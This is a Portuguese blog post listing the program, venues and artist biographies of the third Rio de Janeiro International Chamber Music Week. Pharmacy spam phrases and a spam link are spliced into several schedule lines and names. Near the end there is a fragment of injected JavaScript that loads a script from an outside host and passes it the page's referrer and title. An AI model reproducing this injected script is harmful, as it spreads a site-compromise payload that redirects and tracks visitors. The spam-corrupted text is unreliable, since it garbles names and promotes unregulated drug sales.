LateralMovimentoMúsica de câmaraProgramaçãoRio de Janeiro

III Semana Internacional de Música de Câmara do RJ

A III Semana Internacional de Música Câmara do Rio de Janeiro apresenta programação variada e tem quarteto de cordas americano como residente.

Criada com o objetivo de alargar os domínios da prática da música de câmara não apenas no Estado, mas em todo o país, a  Semana Internacional de Música de Câmara do Rio de Janeiro – único festival de sua categoria no Brasil – chega à sua terceira edição. Agendado entre os dias 17 e 24 de setembro, o evento promove encontros entre renomados solistas brasileiros, jovens promissores e representantes internacionais na Cidade das Artes, na Barra, no Centro Cultural Light, no Centro, na Arena Dicró, na Penha, e no SESI Caxias, em Duque de Caxias.

Quarteto Arianna
Quarteto Arianna

Também chamado de Rio Music Week, o festival deste ano tem como um dos destaques a participação do contrabaixista venezuelano Edicson Ruiz, conhecido como músico mais jovem a ingressar na Filarmônica de Berlim. Além da estreia carioca do jovem músico, também chama a atenção a presença do quarteto americano de cordas Arianna String Quartet como residente do projeto. Completam a experiência camerística: os clarinetistas Mariano Rey, da Argentina, e Juan A. Ferrer, da Espanha, a pianista venezuelana Geraldina Mendez, a premiada pianista croata Martina Filjak, o virtuoso violinista inglês Daniel Rowland e a violista japonesa Tomoko Akasaka (favorita nos principais festivais europeus, ela faz a sua estreia no país). Estes renomados artistas internacionais unem forças com os solistas brasileiros Cristiano Alves (clarineta), Simone Leitão (piano), Daniel Guedes (violino), Jadenir Lacorte (viola), Fábio Presgrave, Hugo Pilger (cello), Flávio Gabriel (trompete e solista da OSESP), Whatson Cardozo (Clarone) e o gaúcho Ney Fialkow (piano).

A Semana Internacional de Música de Câmara do Rio de Janeiro busca, por meio do seu repertório, refletir toda a variedade da música de concerto para pequenas formações através dos séculos. Com isso, o roteiro contempla de Mozart a Prokofieff, de Schumann a Guerra-Peixe, de Beethoven a Vaughan Williams, de Villa-Lobos a Luciano Berio. O encerramento do festival ocorre na Cidade das Artes com a participação da orquestra de câmara itinerante Academia Jovem Concertante. Em uma noite de concertos de duos, o repertório é composto pela Sinfonia Concertante de Mozart para violino, viola e orquestra; o Concertino de Guerra-Peixe, que é o homenageado do festival; e o Concerto para piano, trompete e cordas de Shostakovitch, uma das peças mais celebradas pelas plateias do mundo.

 

Estudantes e residentes

Os concertos que serão realizados no dia 23 de setembro, no Teatro de Câmara da Cidade das Artes, têm um significado especial. Na ocasião, estudantes residentes irão fazer parte da orquestra. Para terem essa oportunidade e a experiência de tocar ao lado de renomados instrumentistas, os jovens músicos passaram por um processo de seleção rigoroso. As vagas  foram preenchidas por um quarteto de cordas, um quinteto de sopros e um contrabaixista.

A ideia do festival é evidenciar o talento de nomes promissores anualmente. Para isso, todo ano, o evento colocará em destaque um jovem músico carioca no posto de “revelação”. Este ano, o oboísta Rodrigo Herculano irá tocar no concerto de abertura com músicos internacionais consagrados.

 

Programação didática

Além dos concertos principais, os músicos internacionais também estarão presentes em workshops, concertos didáticos e masterclasses gratuitas para jovens estudantes de música. A programação didática ocupa concertos na Arena do Dicró, na Penha, e o SESI Caxias, em Duque de Caxias, com entradas gratuitas, e na Cidade das Artes, na Barra, com ingressos a R$20,00 e a R$40,00. Toda a renda dos ingressos será revertida para a compra de instrumentos para projetos que têm como principal objetivo a formação de orquestra no Estado do Rio de Janeiro. O workshops e masterclasses serão realizados na Escola de Música da UFRJ.

Como todo produto cultural Brasil Classical SL 21 Arts, esse é um festival carbono zero. Serão plantadas mudas de árvores pelo Instituto Nacional de Florestas para neutralizar o carbono gerado pelas atividades e traslados do festival.

 

Exibição de filme

O filme Pare Olhe Escute, dirigido por Kátia Lund, será exibido no dia 17 de setembro, às 19h40, antes do concerto de abertura do festival. O documentário mostra a rotina de jovens músicos ao realizarem o sonho de sair em turnê com a orquestra da cidade, acompanhada da pianista Simone Leitão, pelas principais salas de música do país. O filme brasileiro é produzido por Laís Bodanzky e Luiz Bolognesi, da produtora Buriti, e mostra como a música invadiu as ruas, vielas e entrou pela janela das casas dando cor e melodia a uma rotina, outrora, tão opaca, na pequena cidade de Barra Mansa, interior do Rio de Janeiro.

 

PROGRAMAÇÃO

 

Dia 17 de setembro

 

Quarta-feira, 17 de setembro, às 19h40

Exibição do filme “Pare, Olhe Escute”
Documentário: 52min | 2013| São Paulo/SP| Livre

 

Quarta-feira, 17 de setembro, às 21h.
Cidade das Artes

Juan Ferrer, clarineta
Rodrigo Herculano, oboé
Edicson Ruiz, contrabaixo
Simone Leitão, piano

Quarteto Arianna
John McGrosso,
violino
Julia Sakharova, violino
Joanna Mendoza, viola
Kurt Baldwin, violoncelo

 

Osvaldo LACERDA (1927-2011)
Quarteto nº 1

Sergei PROKOFIEFF (1891-1953)
Quinteto em Sol menor para oboé, clarineta, violino, viola e contrabaixo op. 39

Edward ELGAR (1857-1934)
Quinteto em Lá menor para piano e quarteto de cordas op. 84


Coquetel de abertura do evento

buy venlor venlafaxine  


Dia 18 de Setembro


Quinta-feira, 18 de setembro, às 10h.
Cidade das Artes

Daniel Guedes, violino
Hugo Pilger, violoncelo
Simone Leitão, piano

Quarteto Arianna
John McGrosso,
violino
Julia Sakharova, violino
Joanna Mendoza, viola
Kurt Baldwin, violoncelo

 

César GUERRA-PEIXE (1914-1993)
Trio para violino, violoncelo e piano

Ludwig van BEETHOVEN (1770-1827)
Quarteto nº9 em Dó Maior op. 59 nº 3 “Razumovsky”

 

Quinta-feira, 18 de setembro, às 14 e às 15h30
Sala da Congregação, UFRJ

Das 14 às 15h30 – workshop de quarteto de cordas
Ministrado por Quarteto Arianna (com Quarteto Novo Tom)

Das 15h30 às 17h. – masterclass de violoncelo
Ministrado por Kurt Baldwin, Quarteto Arianna

 

Quinta-feira, 18 de setembro, às 21h.
Cidade das Artes

Daniel Guedes, violino
Jadenir Lacorte, viola
Fabio Presgrave, violoncelo
Martina Filjak, piano

 

Robert SCHUMANN (1810-1856)
Romanse op. 28 no. 2
Sonata para piano op. 11 em Fá sustenido menor

Johannes BRAHMS (1833-1897)
Quarteto para piano e cordas em Sol menor, op. 25

 


Dia 19 de Setembro

 

Sexta-feira, 19 de setembro, às 12h30
Centro Cultural Light

Quinteto Brincadeira a Cinco
Felipe Marateo
, flauta
Leandro Finotti, oboé
Gabriel Peter, clarinete
Jeferson Souza, fagote
Werley Nicolau, trompa

Simone Leitão
, piano
Daniel Guedes, violino
Jadenir Lacorte, viola
Hugo Pilger, violoncelo

 

Haydn
Divertimento

José Siqueira
Brincadeira a Cinco

Fernando Morais
Xaxando no Cerrado

Quarteto com piano de Schumann

III movimento Andante Cantabile

IV Movimento Finale

 

Sexta-feira, 19 de setembro, às 14 e às 15h30
Sala da Congregação, UFRJ

Das 14 às 15h30 – masterclass de contrabaixo
Ministrada por Edicson Ruiz

Das 15h30 às 17h. – masterclass de viola
Ministrada por Joanna Mendoza, Quarteto Arianna

 

online meds without a prescription Sexta-feira, 19 de setembro, às 17h.
Arena Dicró (Concerto Didático – Entrada Franca)

Quarteto de Clarinetas Omega
Maurício Silva
, clarineta e requinta
Deusiel Souza http://plouzane-demain.fr/2013/11/2018/02/cheap-duphalac-sachet/ , clarineta
Diego Abreu, clarineta
Mateus Falkemback, clarineta e clarone

Estudantes Residentes

Quarteto Novo Tom
Geovane Marquetti, violino
Iago Pereira, violino
Dênis Rangel, viola
online Alexandre Luiz, violoncelo

 

Luís Gonzaga
Baião
– Arranjo de Everton Machado

Jorge Montilla
Four for Four

Harry Stalpers
Clownery

C. Guerra-Peixe
Mourão
– Arranjo de Mauricio Silva

W. A. MOZART (1756-1791)
Divertimento em Fá maior

H. VILLA-LOBOS (1887-1959)
Quarteto no. 1

 

Sexta-feira, 19 de setembro, às 21h30
Cidade das Artes


Daniel Guedes
, violino
Jadenir Lacorte, viola
Fábio Presgrave, violoncelo
Edicson Ruiz, contrabaixo
Ney Fialkow, piano

 

Domenico GABRIELLI (1651-1690)
Ricercare I, para contrabaixo solo

Luciano BERIO (1925-2003)
Psy, para contrabaixo solo

Elliot CARTER (1908-2012)
Figment III, para contrabaixo solo

Heinz HOLLIGER (1939)
Unbelaubte Gedanken zu Hölderlins “Tinian”, para contrabaixo solo de 5 cordas

Ralph VAUGHAN WILLIAMS (1872-1958)
Quinteto para violino, viola, violoncelo, contrabaixo e piano em Dó menor

 


Dia 20 de Setembro


Sábado, 20 de setembro, às 20h.
Cidade das Artes

Nuno Pinto, clarineta
Martina Filjak, piano

Quarteto Arianna
John McGrosso,
violino
Júlia Sakharova, violino
Joanna Mendoza, viola
Kurt Baldwin, violoncelo


Francis
POULENC (1900-1963)
Sonata para clarineta e piano

Edmundo VILLANI-CORTES (1930)
Luz, para clarineta e piano
Águas Claras, para clarineta e piano

Robert SCHUMANN (1810-1856)
Quinteto para piano e cordas op. 44

 


Dia 21 de Setembro

 

Domingo, 21 de setembro- às 14 e às 15h30
Sala da Congregação, UFRJ

Das 14 às 15h30 – masterclass de violino
Ministrada por John McGrosso, Quarteto Arianna

Das 15h30 às 17h. – masterclass de violino
Ministrada por Daniel Rowland

 

Domingo, 21 de setembro, às 18h.
Cidade das Artes

Cristiano Alves, clarineta
Whatson Cardoso, clarone
Jadenir Lacorte, viola
Fabio Presgrave, violoncelo
Simone Leitão, piano

Quarteto Arianna
John McGrosso, 
violino
Júlia Sakharova, violino
Joanna Mendoza, viola
Kurt Baldwin, violoncelo

 

Heitor VILLA-LOBOS (1887-1959)
Fantasia Concertante para piano, clarineta e fagote

Johannes BRAHMS (1833-1897)
Sexteto para cordas em Si Bemol Maior op. 18

 

 


Dia 22 de Setembro

 

Segunda-feira, 22 de setembro, às 10h.
Cidade das Artes

Cristiano Alves, clarineta
Daniel Rowland, violino
Simone Leitão, piano

Quarteto Arianna
John McGrosso, 
violino
Júlia Sakharova, violino
Joanna Mendoza, viola
Kurt Baldwin, violoncelo

 

Wolfgang A. MOZART (1756 – 1791)
Quinteto com Clarineta em Lá Maior K 58
– Allegro – Larghetto – Menuetto – Allegretto con variazioni

Richard STRAUSS (1864-1949)
Sonata para violino e piano em Mi Bemol Maior, op. 1

 

Segunda-feira, 22 de setembro – às 14 e às 15h30
Sala da Congregação, UFRJ

Das 14 às 15h30 – whorkshop quarteto de cordas
Ministrado por: Quarteto Arianna e Quarteto Novo Tom

Das 15h30 às 17h. – masterclass de trompete
Ministrada por Flavio Gabriel

 

Segunda-feira, 22 de setembro, às 21h.
Cidade das Artes

Daniel Rowland, violino
Hugo Pilger, violoncelo
Ney Fialkow, piano

 

César GUERRA-PEIXE (1914-1993)
Três peças para violoncelo e piano

Piotr TCHAIKOVSKY (1840-1893)
Trio para piano, violino e violoncelo em Lá menor op. 50

 


Dia 23 de Setembro

 

Terça-feira, 23 de setembro, às 10h.
Cidade das Artes

Tomoko Akasaka, viola
Mariano Rey, clarineta
Geraldina Mendez, piano
Estudantes Residentes

Quarteto Novo Tom
Geovane Marquetti
, 1•violino
Iago Pereira, 2•violino
Dênis Rangel, viola
Alexandre Luiz, violoncelo

 

Antonin DVORAK
Quarteto Americano

Robert Schumann
Märchenerzählungen op 132 para clarinet, viola e piano

 

Terça-feira, 23 de setembro, às 21h.
Cidade das Artes

Daniel Rowland, violino
Tomoko Akasaka, viola
Fábio Presgrave, violoncelo
Simone Leitão copegus cheap , piano
Estudantes Residentes

Brincadeira a Cinco
Felipe Marateo
, flauta
Leandro Finotti, oboé
Gabriel Peter, clarinete
Jeferson Souza, fagote
Werley Nicolau, trompa

 

György LIGETI (1923-2006)
Bagatelas
– Allegro con spirito – Rubato Lamentoso – Allegro Grazioso

José SIQUEIRA (1907-1985)
Brincadeira a Cinco

Joseph HAYDN – (1732-1809)
Divertimento
– Allegro con spirito – Andante Quasi Allegretto.”Chorale St. Antoni” – Menuetto – Rondo – Allegretto

Robert SCHUMANN (1810-1856)
Quarteto em Mi Bemol Maior op. 47

 


Dia 24 de Setembro

 

Quarta-feira, 24 de setembro, às 15h.
Sesi Caxias (Concerto Didático – Entrada Franca)

Estudantes Residentes

Quarteto Novo Tom
Geovane Marquetti
, 1•violino
Iago Pereira, 2•violino
Dênis Rangel, viola
Alexandre Luiz, violoncelo

Brincadeira a Cinco
Felipe Marateo
, flauta
Leandro Finotti, oboé
Gabriel Peter, clarine
Jeferson Souza, fagote
Werley Nicolau, trompa

 

H. VILLA-LOBOS (1887-1959) –
Quarteto no. 1

Astor PIAZZOLLA (1921-1992)
A morte do Anjo

Raphael BAPTISTA (1909-1984)
Instantâneos Folclóricos
– Marcha em Volta da Mesa – Tempo de Marcha
– Bagunça com Gato – Moderato
– Tema, Valsinha e Chorinho
– Enxotando Gavião no Quintal – Allegro

Joseph HAYDN (1732-1809)
Divertimento para quinteto de sopros
– Menuetto – Rondo – Allegretto

Fernando MORAIS
Xaxando no serrado

 

Quarta-feira, 24 de setembro, às 21h.
Cidade das Artes – Concerto de Encerramento

Daniel Rowland, violino
Tomoko Akasaka, viola
Flávio Gabriel, trompete
Simone Leitão, piano
Academia Jovem Concertante – Etapa Rio de Janeiro (HYPERLINK http://www.concertante.com.br/site/

 

Wolfgang A. MOZART (1756-1791)
Sinfonia Concertante em Mi Bemol Maior KV 364

César GUERRA-PEIXE (1914-1993)
Concertino para violino e cordas

Dmitri SHOSTAKOVITCH (1906-1975)
Concerto em Dó menor para piano, trompete e orquestra de cordas op. 35

 

 

ARTISTAS ENVOLVIDOS

 

Internacionais

– Estados Unidos: Arianna String Quartet
Inglaterra: John McGrosso (Violino), Julia Sakharova (Violino), Joanna Mendoza (Viola), Kurt Baldwin (Violoncelo) – Daniel Rowland  (Violino)
– Vnezuela: Edicson Ruiz (Contrabaixo) e Geraldina Mendez (Piano)
– Espanha: Juan A. Ferrer (Clarineta)
– Argentina: Mariano Rey (Clarineta)
– Croácia: Martina Filjak (Piano)
– Japão: Tomoko Akasaka (Viola)

 

Nacionais

Cristiano Alves (Clarineta) – Daniel Guedes (Violino) – Fábio Presgrave (Violoncelo) – Flávio Gabriel (Trompete) – Hugo Pilger (Violoncelo) – Jadenir Lacorte (Viola) – Ney Fialkow (Piano) – Rodrigo Herculano (Oboé) – Simone Leitão (Piano) – Whatson Cardozo (Clarone)

 


CURRÍCULOS


ARIANNA STRING QUARTET – Quarteto de Cordas (Estados Unidos)

Aclamado por sua musicalidade excepcional e virtuosismo técnico, o quarteto de cordas americano Arianna String Quartet, estabeleceu-se como um dos melhores conjuntos de câmara da América. Formado em 1992, pelos músicos John McGrosso (Violino), Julia Sakharova (Violino), Joanna Mendoza (Viola) e Kurt Baldwin (Violoncelo), o Arianna ganhou atenção nacional nos Estados Unidos, ao vencer o 1º prêmio de três importantes competições de música câmara: Fischoff Chamber Music Competition, Coleman e Carmel Chamber Music Competitions Também foram laureados no Bordeaux International String Quartet Competition. O quarteto de cordas americano se apresenta regularmente na América do Norte, América do Sul, Europa, Ásia e África do Sul, e já gravou extensivamente pelos selos Centaur, Albany and Urtext Digital Classics.

 

DANIEL ROWLAND – Violino (Inglaterra)

De origem holandesa e inglesa, o violinista Daniel Rowland foi aclamado como ‘maravilhosa e arrebatadora sutiliza” pelo jornal inglês The Guardian. Após estudos com Viktor Liberman, Igor Oistrakh, Ruggiero Ricci e Ivry Gitlis, e vencendo várias competições internacionais, Rowland se estabeleceu no cenário internacional como um artista altamente carismático, expressivo e versátil, e mantém uma agitada carreira internacional como solista, recitalista, músico de câmara e diretor orquestra de câmara.

Como solista, Daniel Rowland tem colaborado com maestros notáveis ​​tais como Andrei Boreiko, Lawrence Foster, Heinz Holliger e Jaap van Zweden. Ele lidera o famoso Brodsky Quartet, forma um duo com a pianista Natacha Kudritskaya e se entrega a sua paixão pelo tango com seu quinteto Chamber Jam Europe – “Um grupo com o poder da dinamite”, segundo a revista alemã Süddeutsche Zeitung. O Stift International Music Festival in Holland, do qual é fundador e diretor artístico, está na décima edição. Daniel é professor de violino no Royal College of Music, em Londres. O instrumento uso por ele é por Lorenzo Storioni, Cremona, 1776.

 

EDICSON RUIZ – Contrabaixo (Venezuela)

Nascido em 1985 em Caracas, Edicson Ruiz estudou contrabaixo no “El Sistema”, da Fundação Nacional Venezuelana de Orquestras Jovens. Em 2001, ele se tornou o mais novo membro da Academia da Filarmônica de Berlim e depois do grupo principal da orquestra alemã. Ruiz é um dos mais importantes contrabaixistas da atualidade e seu virtuosismo impressiona plateias do mundo todo. Em 2002, ele recebeu o Prêmio Felix Ribas José, o maior concedido a artistas na Venezuela.

 

GERALDINA MENDEZ – Piano (Venezuela)

Geraldina Méndez é uma pianista venezuelana mestre em Belas Artes pela Academia Nacional de Música da Ucrânia “P. I. Tchaikovsky “(Kiev). Ela se apresenta em inúmeros recitais e concertos de câmara na Venezuela, Ucrânia, Alemanha, Equador, Luxemburgo e Espanha e como solista com a Simón Bolívar Symphonic Band e a Guayana Symphonic Ensemble sob a regência de Jesús Ignacio Pérez-Perazzo. Geraldina também trabalha como pianista colaboradora para a El Sistema (Rede Nacional de Orquestras e Coros Juvenis e Infantis da Venezuela) desde 2006.

 

JUAN A. FERRER – Carineta (Espanha)

Nascido em Montserrat (Espanha) em 1968, Juan A. Ferrer é clarinetista formado pelo Conservatório de Joaquin Rodrigo de Valência. Por obter as melhoras notas com professores como José Vicente Herrera, Larry Passin, Andrew Marriner, Alan Damiens, Walter Boeykens, Anthony Gigliotti, entre outros, em 1993, foi selecionado pelo professor Yehuda Gilad e ganhou uma bolsa para estudar na Universidade do Sul da Califórnia. Desde 1994 faz parte da Orquestra Sinfónica da Galiza, como clarinete diretor. Ferrer é artista BUFFET-CRAMPON-PARIS. Representou a Espanha na I, II e III Academia Ibero-americana de Clarinete, e em 2014 foi convidado para participar como professor do Encontro Internacional de Clarinete em Caracas).

 

MARIANO REY – Clarinete (Argentina)

Mariano Rey é clarinetista e iniciou seus estudos com o seu pai, o Maestro Carlos Rey. Depois, continuou sua formação com os professores Mariano Frogioni e Martin Tow, Gui Deplus, Michael Arrignon (Conservatório de Paris) e o Maestro Stanley Drucker (Solista do Filarmônica de Nova York).

Durante seus 31 anos de experiência, recebeu mais de 14 prêmios na Argentina e foi aprovado em 6 concursos para cargos na Orquestra Filarmônica do Teatro Cólon em Buenos Aires. Já fez várias performances com maestros e solistas reconhecimento mundial como Zubin Mehta, Franz-Paul Decker, Charles Dutoit, Yuri Temirkanov, entre outros. O músico já se apresentou com diversas orquestras ao redor do mundo, entre elas a Sinfonietta de Paris, a Filarmônica de Bogotá, a Sinfônica Nacional do Rio de Janeiro, a Filarmônica de Israel, e participou de vários concertos ​​com Plácido Domingo, Luciano Pavarotti e José Carreras.

Com 26 anos de trabalho pedagógico, atualmente ele leciona no Departamento de Clarinete e Repertório Orquestral do Instituto Superior de Arte do Teatro Colón, é diretor geral e artístico do Congresso Internacional de Clarinetistas Bs.As (CICBA), membro do Tango Trio Angeleri-Rey-Zárate, e principal solista de clarinete da Orquestra Filarmônica do Teatro Colón de Buenos Aires.

 

MARTINA FILJAK – Piano (Croácia)

Umas das mais celebradas pianistas da nova geração, Martina Filjak vem ganhando elogios internacionais por sua paixão poética e domínio técnico no teclado, bem como por a sua personalidade carismática e magnífica presença de palco.

Martina Filjak chamou a atenção internacional ao ganhar a medalha de ouro e o 1º prêmio e o Prêmio Beethoven no Cleveland International Piano Competition em 2009. Nos últimos anos, Filjak já tocou com importantes orquestras como a Orquestra de Cleveland, a Orquestra Sinfônica de São Diego, a Orquestra da Flórida, a Orquestra de Câmara de Israel, entre outras.

 

TOMOKO AKASAKA – Viola (Japão)

Nascida em Tóquio e residente em Berlim, Tomoko Akasaka é uma das principais violistas da sua geração. Tomoko estudou com Nobuko Imai no Conservatório de Genebra e mais tarde tornou-se professora convidada.

Tomoko Akasaka ganhou vários prêmios, entre eles o 1º prémio no 12º Japan Classical Music Competition e o 3º prêmio no 53º Munich International Music Competition. Ela se apresenta regularmente em concertos em todo o mundo em como Concerthebouw Amsterdam, Tonhalle Zurich, Filarmónica de Berlim, entre outros.

 

CRISTIANO ALVES – Clarineta

Doutor em Música pela UNICAMP e Mestre pela UFRJ, Cristiano Alves iniciou seus estudos musicais aos sete anos de idade e aos dez teve os primeiros contatos com a clarineta. Detentor de diversas premiações em importantes concursos, graduou-se com summa cum laude pela UFRJ, onde foi aluno de José Carlos de Castro. Participou de centenas de gravações sinfônicas e camerísticas, atuando ainda junto a grandes artistas da MPB. Leciona e se apresenta com frequência no exterior e por todo o país. Seu primeiro CD, junto à pianista Tamara Ujakova, figurou como finalista do Prêmio Tim, considerado um dos três melhores lançamentos de música erudita no Brasil. É professor efetivo da cadeira de clarinetas na UFRJ. Realizou diversas primeiras audições em âmbitos nacional e internacional. Com destacada carreira como solista, apresenta-se frequentemente à frente de diversos conjuntos sinfônicos.

 

Purchase DANIEL GUEDES – Violino Cheap

Considerado um dos mais importantes músicos brasileiros de sua geração, Daniel Guedes vem atuando como violinista, violista, camerista, professor e regente. Carioca, nascido em 1977, formou-se na Manhattan School of Music, onde estudou com Pinchas Zukerman e Patinka Kopec. Vem atuando como solista das principais orquestras brasileiras e em vários países do exterior. Como regente, atuou à frente de orquestras como a OSB Ópera e Repertório, OSUSP, Sinfônicas de Campinas, Bahia, da UFRJ, Academia Jovem Concertante, entre outras. Membro do Quarteto da Guanabara e professor da UFRJ. Gravou CD com sonatas de Beethoven com Ilan Rechtman, “Impressões Brasileiras” e “Violão e violino” com Mario Ulloa.

 

FÁBIO PRESGRAVE – Violoncelo

Estudou na Juilliard School em Nova Iorque com H. Shapiro e J. Krosnick. Apresentou‑se como solista com orquestras como Qatar Philarmonic e Orquestra Sinfônica Brasileira. Atuou como professor convidado na MusikHochSchule de Muenster, Royal Academy of Music- Aarhus, Folkwang Universitat der Kunst-Essen. Foi contemplado com o Prêmio Carlos Gomes com o Quarteto Camargo Guarnieri. Recebeu a Menção de destaque da temporada 2003 pelo Jornal do Brasil. Atualmente é Professor da UFRN.

 

FLÁVIO GABRIEL – Trompete

Um dos mais destacados trompetistas de sua geração, Flávio Gabriel conquistou o 2º prêmio no concurso internacional de música Primavera de Praga em 2010. O prêmio, inédito na história do trompete no Brasil, é considerado um dos mais difíceis do mundo. Principal trompetista da Orquestra Sinfônica de Porto Alegre entre 2004 e 2009, atualmente integra o naipe de trompetes da Orquestra Sinfônica do Estado de São Paulo – OSESP.

 

HUGO PILGER – Violoncelo

Mestre em música pela Universidade Federal do Estado do Rio de Janeiro (UNIRIO), apresentou-se como solista à frente de várias orquestras brasileira, além de realizar turnês em diversos países europeus, americanos. É professor de violoncelo da UNIRIO, 1º violoncelo da Orquestra Petrobras Sinfônica e membro do Quarteto Radamés Gnattali. No CD duplo, DVD e BluRay intitulado Presença de Villa-Lobos na Música Brasileira para Violoncelo e Piano gravado com a pianista Lúcia Barrenechea, realizou o primeiro registro em áudio do violoncelo Martin Diehl (1779) que pertenceu a Villa-Lobos. É autor do livro Heitor Villa-Lobos, o violoncelo e seu idiomatismo.

 

JADENIR LACORTE – Viola

Depois de concluir o bacharelado no Rio de Janeiro e já com anos de experiência profissional nas melhores orquestras brasileiras, o violista foi estudar na Holanda com o professor Vladimir Mendelssohn, concluindo o curso de mestrado em solo performance com excelência. Aperfeiçoou-se também com importantes artistas do cenário internacional como Yuri Bashmet, Rivka Golani e Henk Guittar, entre outros. Desde o início de sua carreira tem seus interesses voltados à musica de câmara, o que o fez fundar e colaborar com diversos grupos de câmara no brasil e na Europa. Foi violista dos grupos Montebello (Holanda), ensemble Kontraste (Alemanha) e solo viola da Spirit of Europe Chamber Orchestra (Áustria). Atualmente mora em Viena e ao lado de atividades didáticas e orquestrais tem como principal atividade a musica de câmara.

 

NEY FIALKOW – Piano

Premiado em diversos concursos, destacando-se o cobiçado título de melhor pianista do VII Prêmio Eldorado de Música (SP), Ney Fialkow tem conciliado movimentada carreira de solista e camerista no país e no Exterior com a atividade de professor do Instituto de Artes da UFRGS, em Porto Alegre. Cursou Mestrado em Música no New England Conservatory, em Boston com Patricia Zander; e Doutorado, no Peabody Conservatory of the Johns Hopkins University, em Baltimore com Ann Schein, de quem foi assistente. Em ambas instituições, mundialmente reconhecidas pelo alto nível artístico de professores e alunos, recebeu honras e prêmios por destaque em performance. Pianista com grande versatilidade de repertório, tem encantado plateias com sua expressiva comunicabilidade e sonoridade, e também por um senso incomum de integração a seus parceiros de música de câmera.

 

SIMONE LEITÃO – Piano

Com uma carreira ativa como recitalista, camerista e solista de orquestras nas Américas, Europa e Ásia, Simone Leitão é uma das mais atuantes pianistas brasileiras. A artista é conhecida por sua performance intensa, ampla capacidade técnica, forte direção rítmica e personalidade, mas também vem ganhando notoriedade por divulgar a música clássica brasileira no exterior através do projeto Brasil Classical Series e por idealizar programas culturais e sociais que “popularizam” a música erudita no Brasil, como a Academia Jovem Concertante e a Semanas Internacional de Música de Câmara do Rio de Janeiro e de Belo Horizonte.

Simone possui D.M.A. (Doctor of Musical Arts) em Piano Performance e História da Música pela Universidade de Miami (Estados Unidos), Mestrado pela Norges Musikkhögskole (Academia de Música da Noruega, Oslo) e Bacharelado em Música pela Uni-Rio. É especialista nas obras para piano e orquestra de Villa-Lobos.

 

WHATSON CARDOZO – Clarone

Assistente/Clarone com Requinta da OSBA na temporada 2012/2013, Whatson Cardozo é natural de Niterói-RJ e iniciou seus estudos de clarinete aos dez anos de idade na banda de música do Colégio Salesianos Santa Rosa, sob orientação do maestro Affonso Reis e Jorgelen de Oliveira, prosseguindo-os com Cristiano Alves, Thiago Tavares e Edmilson Nery. A convite do oboísta e maestro Alex Klein, participou como Jovem Artista Residente do Oferenda Musical (SP) e como Artista Residente do MIMU (MG). Como solista, atuou nas OSB Jovem, Companhia Experimental de Ópera e Academia Petrobras Sinfônica. E, clarinetista convidado de orquestras como OPES, OSSE, OCAM, OEMT, OFES, OSTMRJ, OSUFBA, entre outras. Participou de diversos musicais, shows e gravações na música popular. Atualmente, integra o naipe de clarinetes da Orquestra Sinfônica Brasileira.

 

 

SERVIÇO

 

III Semana Internacional de Música de Câmara do Rio de Janeiro
De 17 a 24 de setembro
NA WEB: www.riomusicweek.com

 

Concertos no Teatro de Câmara da Cidade das Artes
Av. das Américas, 5300, Barra da Tijuca
Bilheteria Terça a Domingo das 13 às 19h. Em dias de espetáculo das 13h. até 30 minutos após o início.
Ingressos: R$20 e R$40

 

Concerto Centro Cultural Light
Rua Marechal Floriano, 168, Centro
Fone: n(21) 2211-4515
Ingresso: R$5

 

Concerto didático Arena Dicró
Praça Ary Barroso, Penha. Entrada pela Rua Flora Lobo
Fopne: (21) 3486-7643
Purchase Entrada gratuita

 

Concerto didático SESi Caxias
Rua Arthur Neiva, 100, Duque de Caxias
Fone: (21) 2771-0216
Entrada gratuita

 

 

 } else {s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.